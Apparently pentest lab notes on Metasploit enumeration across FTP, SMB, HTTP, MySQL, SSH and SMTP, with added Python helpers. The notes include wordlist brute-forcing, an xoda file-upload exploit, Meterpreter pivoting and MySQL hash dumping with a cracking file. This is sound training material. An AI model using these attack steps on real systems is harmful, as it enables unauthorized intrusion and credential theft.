Information Gathering & Enumeration

Nmap Enumeration

Nmap enumeration results (service versions, operating systems, etc.) can be exported to an XML file and imported into the MSF database, where they are used for further detection and exploitation.

🔬 Check the full nmap information gathering lab in this Nmap Host Discovery Lab (at the end of the page).

Some commands:

nmap <TARGET_IP>
nmap -Pn <TARGET_IP>            # -Pn: skip host discovery (treat the host as up)
nmap -Pn -sV -O <TARGET_IP>     # -sV: service/version detection, -O: OS detection

  • Output the nmap scan results into an XML file (-oX) that can be imported into MSF

nmap -Pn -sV -O 10.2.18.161 -oX windows_server_2012

  • In the same lab environment from above, use msfconsole to import the results into MSF with the db_import command

service postgresql start
msfconsole

  • Inside msfconsole

db_status
workspace -a Win2k12
db_import /root/windows_server_2012
[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Nokogiri v1.10.7'
[*] Importing host 10.2.18.161
[*] Successfully imported /root/windows_server_2012
hosts
services
vulns
loot
creds
notes

  • Perform an nmap scan within the MSF Console and import the results in a dedicated workspace

workspace -a nmap_MSF
db_nmap -Pn -sV -O <TARGET_IP>
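As an added example (not part of the original notes and not Metasploit's own code), the Python script below parses the same kind of Nmap XML that db_import reads and turns it into a resource script that msfconsole -q -r can replay: one workspace, the import, then a version-scanner module per open service. The XML host and services are constructed for the example, and the service-to-module mapping is my own assumption, limited to the modules used elsewhere on this page.

```python
"""Parse Nmap -oX output and emit a Metasploit resource script.

Added example (not from the original notes). The Nmap XML below is
constructed; the service -> module table is an assumption restricted to
the version-scanner modules used on this page.
Run the generated script with:  msfconsole -q -r enum.rc
"""
import xml.etree.ElementTree as ET

# Constructed sample: the shape `nmap -sV -O -oX` produces, trimmed to the
# elements db_import actually consumes (host, address, ports, services).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -Pn -sV -O -oX scan.xml 10.2.18.161">
  <host>
    <status state="up"/>
    <address addr="10.2.18.161" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open"/>
        <service name="ftp" product="ProFTPD" version="1.3.5a"/>
      </port>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="7.9p1"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http" product="Apache httpd" version="2.4.18"/>
      </port>
      <port protocol="tcp" portid="3306">
        <state state="filtered"/>
        <service name="mysql"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

# Service name (as nmap labels it) -> version-fingerprinting module. Assumed
# mapping; extend it for your own engagement.
VERSION_MODULES = {
    "ftp": "auxiliary/scanner/ftp/ftp_version",
    "ssh": "auxiliary/scanner/ssh/ssh_version",
    "http": "auxiliary/scanner/http/http_version",
    "mysql": "auxiliary/scanner/mysql/mysql_version",
    "smtp": "auxiliary/scanner/smtp/smtp_version",
    "microsoft-ds": "auxiliary/scanner/smb/smb_version",
    "netbios-ssn": "auxiliary/scanner/smb/smb_version",
}


def parse_nmap_xml(xml_text):
    """Return [(ip, port, proto, service, product, version)] for open ports only."""
    root = ET.fromstring(xml_text)
    results = []
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        ip = addr.get("addr")
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # filtered/closed ports are not worth a scanner run
            svc = port.find("service")
            get = (lambda k: svc.get(k, "")) if svc is not None else (lambda k: "")
            results.append((ip, int(port.get("portid")), port.get("protocol"),
                            get("name"), get("product"), get("version")))
    return results


def build_resource_script(findings, workspace, xml_path):
    """Emit msfconsole commands: import the XML, then fingerprint each open service."""
    lines = [f"workspace -a {workspace}", f"db_import {xml_path}"]
    for ip, port, proto, name, product, version in findings:
        module = VERSION_MODULES.get(name)
        if module is None or proto != "tcp":
            lines.append(f"# {ip}:{port}/{proto} {name} {product} {version} - no module mapped")
            continue
        lines += [f"use {module}", f"set RHOSTS {ip}", f"set RPORT {port}", "run"]
    lines += ["hosts", "services"]  # show what the database now holds
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    found = parse_nmap_xml(SAMPLE_NMAP_XML)
    print(build_resource_script(found, "Win2k12", "/root/windows_server_2012"))
```

The filtered 3306/tcp port is deliberately left out of the generated script: db_import records it, but running a version scanner against a port that did not answer only wastes time and noise.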

MSF auxiliary modules are used during the information-gathering phase (like nmap) and during the post-exploitation phase of the pentest, to:

  • perform TCP/UDP port scanning

  • enumerate services

  • discover hosts on different network subnets (post-exploitation phase)

Lab Network Service Scanning

🔬 Lab T1046 : Network Service Scanning

service postgresql start && msfconsole -q
workspace -a Port_scan
search portscan
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.41.167.3
run
curl 192.41.167.3

  • Exploitation

search xoda
use exploit/unix/webapp/xoda_file_upload
set RHOSTS 192.41.167.3
set TARGETURI /
run

  • Perform a network scan on the second target

meterpreter > shell
/bin/bash -i
ifconfig
# 192.26.158.2 is the first target's address on the internal LAN (its second interface)
exit

  • Add the route within meterpreter and background the meterpreter session

run autoroute -s 192.26.158.2
# -s is the subnet to route through this session; the netmask defaults to 255.255.255.0 (-n to change it), so this covers 192.26.158.0/24
# run autoroute -p prints the active routes
background
search portscan
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.26.158.3
run
# the port scan is performed through the first target system using the route
[+] 192.26.158.3: - 192.26.158.3:22 - TCP OPEN
[+] 192.26.158.3: - 192.26.158.3:21 - TCP OPEN
[+] 192.26.158.3: - 192.26.158.3:80 - TCP OPEN

  • Upload and run nmap against the second target, from the first target machine

sessions 1
upload /root/tools/static-binaries/nmap /tmp/nmap
shell
/bin/bash -i
cd /tmp
chmod +x ./nmap
./nmap -p- 192.26.158.3
21/tcp open ftp
22/tcp open ssh
80/tcp open http

📌 There are 3 running services on the second target machine.
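A TCP scan that crosses a Meterpreter route can silently miss ports (timeouts, rate limiting on the pivot), which is why the lab repeats the scan with a static nmap on the first target. The Python below is an added example, not part of the original notes: it parses the two output formats shown above (constructed copies of those lines are embedded) and reports any port that one scanner saw and the other did not.

```python
"""Cross-check a routed portscan/tcp run against an on-host nmap scan.

Added example (not from the original notes). Both inputs are constructed
to match the output format printed in the lab above.
"""
import re

# Constructed: lines as printed by auxiliary/scanner/portscan/tcp
MSF_PORTSCAN_OUTPUT = """\
[+] 192.26.158.3: - 192.26.158.3:22 - TCP OPEN
[+] 192.26.158.3: - 192.26.158.3:21 - TCP OPEN
[+] 192.26.158.3: - 192.26.158.3:80 - TCP OPEN
[*] 192.26.158.3: - Scanned 1 of 1 hosts (100% complete)
"""

# Constructed: port lines as printed by ./nmap -p- on the pivot host
NMAP_OUTPUT = """\
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
3306/tcp filtered mysql
"""

# "[+] <ip>: - <ip>:<port> - TCP OPEN"  (the IP is repeated on the line)
MSF_RE = re.compile(r"^\[\+\] (?P<ip>[\d.]+): - (?P=ip):(?P<port>\d+) - TCP OPEN$")
# "<port>/<proto> <state> <service>"
NMAP_RE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)$")


def parse_msf_portscan(text):
    """Return {ip: {port, ...}} of the ports portscan/tcp reported open."""
    hosts = {}
    for line in text.splitlines():
        m = MSF_RE.match(line.strip())
        if m:
            hosts.setdefault(m["ip"], set()).add(int(m["port"]))
    return hosts


def parse_nmap_ports(text):
    """Return {port: service} for the open TCP ports in nmap's normal output."""
    open_ports = {}
    for line in text.splitlines():
        m = NMAP_RE.match(line.strip())
        if m and m["proto"] == "tcp" and m["state"] == "open":
            open_ports[int(m["port"])] = m["service"]
    return open_ports


def compare_scans(msf_hosts, target_ip, nmap_ports):
    """Report what each scanner saw that the other did not."""
    routed = msf_hosts.get(target_ip, set())   # empty if the routed scan saw nothing
    direct = set(nmap_ports)
    return {
        "agreed": sorted(routed & direct),
        "missed_by_routed_scan": sorted(direct - routed),
        "missed_by_nmap": sorted(routed - direct),
    }


if __name__ == "__main__":
    result = compare_scans(parse_msf_portscan(MSF_PORTSCAN_OUTPUT), "192.26.158.3",
                           parse_nmap_ports(NMAP_OUTPUT))
    print(result)
```

Anything in missed_by_routed_scan is a port to re-test through the route (a larger THREADS or TIMEOUT value on portscan/tcp, or simply trusting the on-host result) before deciding the pivot is giving you a complete picture.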

UDP Scan

  • Into msfconsole

search udp_sweep
use auxiliary/scanner/discovery/udp_sweep
set RHOSTS 192.41.167.3
run

📌🔬 Check the Enumeration Section labs here for basic nmap enumeration.

Next, there are some MSF commands and modules for service enumeration on the same labs from the Enumeration Section.

  • Auxiliary modules can be used for enumeration, brute-force attacks, etc.

❗📝 On every attacker machine, run this command to start msfconsole:

service postgresql start && msfconsole -q

  • Set a global variable. setg sets the RHOSTS option for every module loaded afterwards in this session (unsetg RHOSTS clears it):

setg RHOSTS <TARGET_IP>

FTP

auxiliary/scanner/ftp/ftp_version

ip -br -c a
workspace -a FTP_ENUM
search portscan
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.146.175.3
run
[+] 192.146.175.3: - 192.146.175.3:21 - TCP OPEN
back
search type:auxiliary name:ftp
use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.146.175.3
run
[+] 192.146.175.3:21 - FTP Banner: '220 ProFTPD 1.3.5a Server (AttackDefense-FTP) [::ffff:192.146.175.3]\x0d\x0a'
search ProFTPD
# look for modules that match the product named in the banner

auxiliary/scanner/ftp/ftp_login

back
search type:auxiliary name:ftp
use auxiliary/scanner/ftp/ftp_login
show options
set RHOSTS 192.146.175.3
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
run
[+] 192.146.175.3:21 - 192.146.175.3:21 - Login Successful: sysadmin:654321

auxiliary/scanner/ftp/anonymous

back
search type:auxiliary name:ftp
use auxiliary/scanner/ftp/anonymous
set RHOSTS 192.146.175.3
run

SMB/SAMBA

auxiliary/scanner/smb/smb_version

ip -br -c a
setg RHOSTS 192.132.155.3
workspace -a SMB_ENUM
search type:auxiliary name:smb
use auxiliary/scanner/smb/smb_version
options
run
[*] 192.132.155.3:445 - Host could not be identified: Windows 6.1 (Samba 4.3.11-Ubuntu)

auxiliary/scanner/smb/smb_enumusers

back
search type:auxiliary name:smb
use auxiliary/scanner/smb/smb_enumusers
info
run
[+] 192.132.155.3:139 - SAMBA-RECON [ john, elie, aisha, shawn, emma, admin ] ( LockoutTries=0 PasswordMin=5 )

auxiliary/scanner/smb/smb_enumshares

back
search type:auxiliary name:smb
use auxiliary/scanner/smb/smb_enumshares
set ShowFiles true
run
[+] 192.132.155.3:139 - public - (DS)
[+] 192.132.155.3:139 - john - (DS)
[+] 192.132.155.3:139 - aisha - (DS)
[+] 192.132.155.3:139 - emma - (DS)
[+] 192.132.155.3:139 - everyone - (DS)
[+] 192.132.155.3:139 - IPC$ - (I) IPC Service (samba.recon.lab)

auxiliary/scanner/smb/smb_login

back
search smb_login
use auxiliary/scanner/smb/smb_login
options
set SMBUser admin
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
run
[+] 192.132.155.3:445 - 192.132.155.3:445 - Success: '.\admin:password'

HTTP

🔬 Metasploit - Apache Enumeration Lab

  • Remember to set the correct RPORT in the module options and, when targeting a web server with SSL/TLS enabled, set SSL to true as well.

ip -br -c a
setg RHOSTS 192.106.226.3
setg RHOST 192.106.226.3
workspace -a HTTP_ENUM

auxiliary/scanner/http/apache_userdir_enum

search apache_userdir_enum
use auxiliary/scanner/http/apache_userdir_enum
options
info
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
run
[+] http://192.106.226.3/ - Users found: rooty

auxiliary/scanner/http/brute_dirs

auxiliary/scanner/http/dir_scanner

search dir_scanner
use auxiliary/scanner/http/dir_scanner
options
run
[+] Found http://192.106.226.3:80/cgi-bin/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/data/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/doc/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/downloads/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/icons/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/manual/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/secure/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/users/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/uploads/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/web_app/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/view/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/webadmin/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/webmail/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/webdb/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/webdav/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/~admin/ 404 (192.106.226.3)
[+] Found http://192.106.226.3:80/~nobody/ 404 (192.106.226.3)
# dir_scanner first requests a random directory to learn the server's "not found" response, then reports every path whose response code differs from it. Every hit above is a 404, so the calibrated code was something else; confirm each path manually (e.g. curl -I) before treating it as a real directory.

auxiliary/scanner/http/dir_listing

auxiliary/scanner/http/http_put

auxiliary/scanner/http/files_dir

search files_dir
use auxiliary/scanner/http/files_dir
options
set DICTIONARY /usr/share/metasploit-framework/data/wmap/wmap_files.txt
run
[+] Found http://192.106.226.3:80/file.backup 200
[*] Using code '404' as not found for files with extension .bak
[*] Using code '404' as not found for files with extension .c
[+] Found http://192.106.226.3:80/code.c 200
[*] Using code '404' as not found for files with extension .cfg
[+] Found http://192.106.226.3:80/code.cfg 200
[*] Using code '404' as not found for files with extension .class
[...]
[*] Using code '404' as not found for files with extension .html
[+] Found http://192.106.226.3:80/index.html 200
[*] Using code '404' as not found for files with extension .htm
[...]
[+] Found http://192.106.226.3:80/test.php 200
[*] Using code '404' as not found for files with extension .tar
[...]

auxiliary/scanner/http/http_login

search http_login
use auxiliary/scanner/http/http_login
options
set AUTH_URI /secure/
unset USERPASS_FILE
echo "rooty" > user.txt
# msfconsole hands unknown commands to the system shell, so this writes user.txt in the current directory (/root here)
set USER_FILE /root/user.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
run

auxiliary/scanner/http/http_header

search http_header
use auxiliary/scanner/http/http_header
options
run
[+] 192.106.226.3:80 : CONTENT-TYPE: text/html
[+] 192.106.226.3:80 : LAST-MODIFIED: Wed, 27 Feb 2019 04:21:01 GMT
[+] 192.106.226.3:80 : SERVER: Apache/2.4.18 (Ubuntu)
[+] 192.106.226.3:80 : detected 3 headers

auxiliary/scanner/http/http_version

search type:auxiliary name:http
use auxiliary/scanner/http/http_version
options
run
# for an HTTPS website, set RPORT 443 and set SSL true
[+] 192.106.226.3:80 Apache/2.4.18 (Ubuntu)

auxiliary/scanner/http/robots_txt

search robots_txt
use auxiliary/scanner/http/robots_txt
options
run
[+] Contents of Robots.txt:
# robots.txt for attackdefense
User-agent: test
# Directories
Allow: /webmail
User-agent: *
# Directories
Disallow: /data
Disallow: /secure
curl http://192.106.226.3/data/
curl http://192.106.226.3/secure/
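The robots.txt above leaks three paths in two different ways: /data and /secure are disallowed for every crawler, and /webmail is allowed only for an agent named "test", which still tells you the directory exists. The Python below is an added example (not from the original notes or from the Metasploit module): a small robots.txt parser that keeps the User-agent grouping straight, collects every path either rule type mentions, and prints the manual curl follow-ups. The input is the file shown on this page, embedded as a string; the host in the curl commands is the lab target and is an assumption of the example.

```python
"""Parse robots.txt into per-agent rules and list the paths worth probing.

Added example (not from the original notes). ROBOTS_TXT is the file the
robots_txt module printed above, embedded as a constructed string.
"""

ROBOTS_TXT = """\
# robots.txt for attackdefense
User-agent: test
# Directories
Allow: /webmail

User-agent: *
# Directories
Disallow: /data
Disallow: /secure
"""


def parse_robots(text):
    """Return {agent: {"allow": [...], "disallow": [...]}} per User-agent group."""
    groups = {}
    current = []            # agents the following rule lines apply to
    expecting_agent = True  # True while reading consecutive User-agent lines
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and whitespace
        if not line or ":" not in line:
            continue
        field, _, value = line.partition(":")
        field, value = field.strip().lower(), value.strip()
        if field == "user-agent":
            # Consecutive User-agent lines share one rule set; a User-agent
            # line that follows a rule line starts a new group.
            if not expecting_agent:
                current = []
            current.append(value)
            groups.setdefault(value, {"allow": [], "disallow": []})
            expecting_agent = True
        elif field in ("allow", "disallow") and current:
            for agent in current:
                groups[agent][field].append(value)
            expecting_agent = False
    return groups


def paths_to_probe(groups):
    """Every non-empty path any group mentions. Disallow entries are the
    obvious targets, but Allow entries for non-wildcard agents leak paths too."""
    paths = set()
    for rules in groups.values():
        paths.update(p for p in rules["disallow"] if p)
        paths.update(p for p in rules["allow"] if p)
    return sorted(paths)


def curl_commands(host, paths):
    """Manual follow-up checks; `host` is assumed by the example."""
    return [f"curl -sI http://{host}{p.rstrip('/')}/" for p in paths]


if __name__ == "__main__":
    for cmd in curl_commands("192.106.226.3", paths_to_probe(parse_robots(ROBOTS_TXT))):
        print(cmd)
```

An empty "Disallow:" line (which means "allow everything") is kept out of the probe list, and comment-only or malformed lines are skipped rather than crashing the parser, both of which show up in real-world robots.txt files.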

MYSQL

🔬 Metasploit - MySQL Enumeration Lab

ip -br -c a
setg RHOSTS 192.64.22.3
setg RHOST 192.64.22.3
workspace -a MYSQL_ENUM

auxiliary/admin/mysql/mysql_enum

search mysql_enum
use auxiliary/admin/mysql/mysql_enum
info
set USERNAME root
set PASSWORD twinkle
run
[*] 192.64.22.3:3306 - Running MySQL Enumerator...
[*] 192.64.22.3:3306 - Enumerating Parameters
[*] 192.64.22.3:3306 - MySQL Version: 5.5.61-0ubuntu0.14.04.1
[*] 192.64.22.3:3306 - Compiled for the following OS: debian-linux-gnu
[*] 192.64.22.3:3306 - Architecture: x86_64
[*] 192.64.22.3:3306 - Server Hostname: victim-1
[*] 192.64.22.3:3306 - Data Directory: /var/lib/mysql/
[*] 192.64.22.3:3306 - Logging of queries and logins: OFF
[*] 192.64.22.3:3306 - Old Password Hashing Algorithm OFF
[*] 192.64.22.3:3306 - Loading of local files: ON
[*] 192.64.22.3:3306 - Deny logins with old Pre-4.1 Passwords: OFF
[*] 192.64.22.3:3306 - Allow Use of symlinks for Database Files: YES
[*] 192.64.22.3:3306 - Allow Table Merge:
[*] 192.64.22.3:3306 - SSL Connection: DISABLED
[*] 192.64.22.3:3306 - Enumerating Accounts:
[*] 192.64.22.3:3306 - List of Accounts with Password Hashes:
[+] 192.64.22.3:3306 - User: root Host: localhost Password Hash: *A0E23B565BACCE3E70D223915ABF2554B2540144
[+] 192.64.22.3:3306 - User: root Host: 891b50fafb0f Password Hash:
[+] 192.64.22.3:3306 - User: root Host: 127.0.0.1 Password Hash:
[+] 192.64.22.3:3306 - User: root Host: ::1 Password Hash:
[+] 192.64.22.3:3306 - User: debian-sys-maint Host: localhost Password Hash: *F4E71A0BE028B3688230B992EEAC70BC598FA723
[+] 192.64.22.3:3306 - User: root Host: % Password Hash: *A0E23B565BACCE3E70D223915ABF2554B2540144
[+] 192.64.22.3:3306 - User: filetest Host: % Password Hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[+] 192.64.22.3:3306 - User: ultra Host: localhost Password Hash: *94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29
[+] 192.64.22.3:3306 - User: guest Host: localhost Password Hash: *17FD2DDCC01E0E66405FB1BA16F033188D18F646
[+] 192.64.22.3:3306 - User: gopher Host: localhost Password Hash: *027ADC92DD1A83351C64ABCD8BD4BA16EEDA0AB0
[+] 192.64.22.3:3306 - User: backup Host: localhost Password Hash: *E6DEAD2645D88071D28F004A209691AC60A72AC9
[+] 192.64.22.3:3306 - User: sysadmin Host: localhost Password Hash: *78A1258090DAA81738418E11B73EB494596DFDD3
[*] 192.64.22.3:3306 - The following users have GRANT Privilege:
[...]
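The account list above is where the real findings are, and they are easy to miss in a wall of hashes: three root entries have no password at all, root and filetest can connect from any host (%), and root@% carries the same hash as root@localhost. The Python below is an added example, not part of the original notes or of the mysql_enum module: it parses the "User: ... Host: ... Password Hash: ..." lines (a constructed copy of some of those lines is embedded), flags those conditions, and writes user:hash lines for offline cracking.

```python
"""Triage the account list printed by auxiliary/admin/mysql/mysql_enum.

Added example (not from the original notes). MYSQL_ENUM_OUTPUT is a
constructed subset of the output lines shown above.
"""
import re
from collections import defaultdict

MYSQL_ENUM_OUTPUT = """\
[+] 192.64.22.3:3306 - User: root Host: localhost Password Hash: *A0E23B565BACCE3E70D223915ABF2554B2540144
[+] 192.64.22.3:3306 - User: root Host: 891b50fafb0f Password Hash:
[+] 192.64.22.3:3306 - User: root Host: 127.0.0.1 Password Hash:
[+] 192.64.22.3:3306 - User: root Host: ::1 Password Hash:
[+] 192.64.22.3:3306 - User: debian-sys-maint Host: localhost Password Hash: *F4E71A0BE028B3688230B992EEAC70BC598FA723
[+] 192.64.22.3:3306 - User: root Host: % Password Hash: *A0E23B565BACCE3E70D223915ABF2554B2540144
[+] 192.64.22.3:3306 - User: filetest Host: % Password Hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[+] 192.64.22.3:3306 - User: ultra Host: localhost Password Hash: *94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29
"""

# The hash group is optional: a line ending in "Password Hash:" is an
# account with an empty password.
ACCOUNT_RE = re.compile(
    r"^\[\+\] \S+ - User: (?P<user>\S+) Host: (?P<host>\S+) Password Hash:\s*(?P<hash>\S*)$"
)


def parse_accounts(text):
    """Return [(user, host, hash)] with hash == '' for passwordless accounts."""
    accounts = []
    for line in text.splitlines():
        m = ACCOUNT_RE.match(line.strip())
        if m:
            accounts.append((m["user"], m["host"], m["hash"]))
    return accounts


def triage(accounts):
    """Group the findings the way you would report them."""
    by_hash = defaultdict(list)
    for user, host, h in accounts:
        if h:
            by_hash[h].append(f"{user}@{host}")
    return {
        "no_password": [f"{u}@{h}" for u, h, hsh in accounts if not hsh],
        "any_host": [f"{u}@{h}" for u, h, hsh in accounts if h == "%"],
        "shared_password": {h: users for h, users in by_hash.items() if len(users) > 1},
        # mysql_native_password hashes are '*' + 40 hex chars; anything else
        # (the 16-hex-char pre-4.1 scheme) is far weaker and worth calling out.
        "legacy_hash": [f"{u}@{h}" for u, h, hsh in accounts if hsh and not hsh.startswith("*")],
    }


def cracking_file(accounts):
    """user:hash lines, one per distinct user, for john --format=mysql-sha1
    (hashcat -m 300 wants the same 40 hex chars without the leading '*')."""
    seen = {}
    for user, host, h in accounts:
        if h and user not in seen:
            seen[user] = h
    return "\n".join(f"{u}:{h}" for u, h in seen.items()) + "\n"


if __name__ == "__main__":
    accts = parse_accounts(MYSQL_ENUM_OUTPUT)
    print(triage(accts))
    print(cracking_file(accts))
```

The passwordless root entries are bound to localhost-style hosts, so they matter once you have code execution on the box (or a tunnel into it); the root@% and filetest@% entries are the ones reachable straight from the scanner, and the shared hash means one cracked password opens both root entries.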

auxiliary/admin/mysql/mysql_sql

search mysql_sql
use auxiliary/admin/mysql/mysql_sql
options
set USERNAME root
set PASSWORD twinkle
run
# the SQL option defaults to 'select version()'; set your own query
set SQL show databases;
run
[*] 192.64.22.3:3306 - Sending statement: 'select version()'...
[*] 192.64.22.3:3306 - | 5.5.61-0ubuntu0.14.04.1 |
[*] 192.64.22.3:3306 - Sending statement: 'show databases;'...
[*] 192.64.22.3:3306 - | information_schema |
[*] 192.64.22.3:3306 - | mysql |
[*] 192.64.22.3:3306 - | performance_schema |
[*] 192.64.22.3:3306 - | upload |
[*] 192.64.22.3:3306 - | vendors |
[*] 192.64.22.3:3306 - | videos |
[*] 192.64.22.3:3306 - | warehouse |

auxiliary/scanner/mysql/mysql_file_enum

auxiliary/scanner/mysql/mysql_hashdump

auxiliary/scanner/mysql/mysql_login

search mysql_login
use auxiliary/scanner/mysql/mysql_login
options
set USERNAME root
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
set STOP_ON_SUCCESS false
run
[+] 192.64.22.3:3306 - 192.64.22.3:3306 - Success: 'root:twinkle'

auxiliary/scanner/mysql/mysql_schemadump

search mysql_schemadump
use auxiliary/scanner/mysql/mysql_schemadump
options
set USERNAME root
set PASSWORD twinkle
run
[+] 192.64.22.3:3306 - Schema stored in: /root/.msf4/loot/20230413112948_MYSQL_ENUM_192.64.22.3_mysql_schema_807923.txt
[+] 192.64.22.3:3306 - MySQL Server Schema
Host: 192.64.22.3
Port: 3306
====================
---
- DBName: upload
  Tables: []
- DBName: vendors
  Tables: []
- DBName: videos
  Tables: []
- DBName: warehouse
  Tables: []

auxiliary/scanner/mysql/mysql_version

search type:auxiliary name:mysql
use auxiliary/scanner/mysql/mysql_version
options
run
[+] 192.64.22.3:3306 - 192.64.22.3:3306 is running MySQL 5.5.61-0ubuntu0.14.04.1 (protocol 10)
# MySQL and Ubuntu versions enumerated

auxiliary/scanner/mysql/mysql_writable_dirs

  • Check the MySQL Enumerated data within MSF:

hosts
services
loot
creds

SSH

🔬 Metasploit - SSH Login

ip -br -c a
setg RHOSTS 192.127.196.3
setg RHOST 192.127.196.3
workspace -a SSH_ENUM

auxiliary/scanner/ssh/ssh_version

search type:auxiliary name:ssh
use auxiliary/scanner/ssh/ssh_version
options
run
[+] 192.127.196.3:22 - SSH server version: SSH-2.0-OpenSSH_7.9p1 Ubuntu-10 ( service.version=7.9p1 openssh.comment=Ubuntu-10 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:7.9p1 os.vendor=Ubuntu os.family=Linux os.product=Linux os.version=19.04 os.cpe23=cpe:/o:canonical:ubuntu_linux:19.04 service.protocol=ssh fingerprint_db=ssh.banner )
# SSH-2.0-OpenSSH_7.9p1 and Ubuntu 19.04

auxiliary/scanner/ssh/ssh_login

search ssh_login
use auxiliary/scanner/ssh/ssh_login
# for password authentication
options
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
run
[+] 192.127.196.3:22 - Success: 'sysadmin:hailey' ''
[*] Command shell session 1 opened (192.127.196.2:37093 -> 192.127.196.3:22)
[+] 192.127.196.3:22 - Success: 'rooty:pineapple' ''
[*] Command shell session 2 opened (192.127.196.2:44935 -> 192.127.196.3:22)
[+] 192.127.196.3:22 - Success: 'demo:butterfly1' ''
[*] Command shell session 3 opened (192.127.196.2:39681 -> 192.127.196.3:22)
[+] 192.127.196.3:22 - Success: 'auditor:xbox360' ''
[*] Command shell session 4 opened (192.127.196.2:42273 -> 192.127.196.3:22)
[+] 192.127.196.3:22 - Success: 'anon:741852963' ''
[*] Command shell session 5 opened (192.127.196.2:44263 -> 192.127.196.3:22)
[+] 192.127.196.3:22 - Success: 'administrator:password1' ''
[*] Command shell session 6 opened (192.127.196.2:39997 -> 192.127.196.3:22)
[+] 192.127.196.3:22 - Success: 'diag:secret' ''

  • This module opens a command shell session for every successful login (list them with sessions -l and interact with sessions -i <id>), so a large wordlist against a host with many weak accounts leaves you with many open sessions.

auxiliary/scanner/ssh/ssh_enumusers

search type:auxiliary name:ssh
use auxiliary/scanner/ssh/ssh_enumusers
options
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
run
[+] 192.127.196.3:22 - SSH - User 'sysadmin' found
[+] 192.127.196.3:22 - SSH - User 'rooty' found
[+] 192.127.196.3:22 - SSH - User 'demo' found
[+] 192.127.196.3:22 - SSH - User 'auditor' found
[+] 192.127.196.3:22 - SSH - User 'anon' found
[+] 192.127.196.3:22 - SSH - User 'administrator' found
[+] 192.127.196.3:22 - SSH - User 'diag' found
# the module infers users from server behaviour and can produce false positives; set CHECK_FALSE true to have it test a random username first

SMTP

🔬 SMTP - Postfix Recon: Basics

ip -br -c a
setg RHOSTS 192.8.115.3
setg RHOST 192.8.115.3
workspace -a SMTP_ENUM
# run a port scan first to identify the SMTP port; here it is port 25

auxiliary/scanner/smtp/smtp_enum

search type:auxiliary name:smtp
use auxiliary/scanner/smtp/smtp_enum
options
run
[+] 192.63.243.3:25 - 192.63.243.3:25 Users found: , admin, administrator, backup, bin, daemon, games, gnats, irc, list, lp, mail, man, news, nobody, postmaster, proxy, sync, sys, uucp, www-data

auxiliary/scanner/smtp/smtp_version

search type:auxiliary name:smtp
use auxiliary/scanner/smtp/smtp_version
options
run
[+] 192.8.115.3:25 - 192.8.115.3:25 SMTP 220 openmailbox.xyz ESMTP Postfix: Welcome to our mail server.\x0d\x0a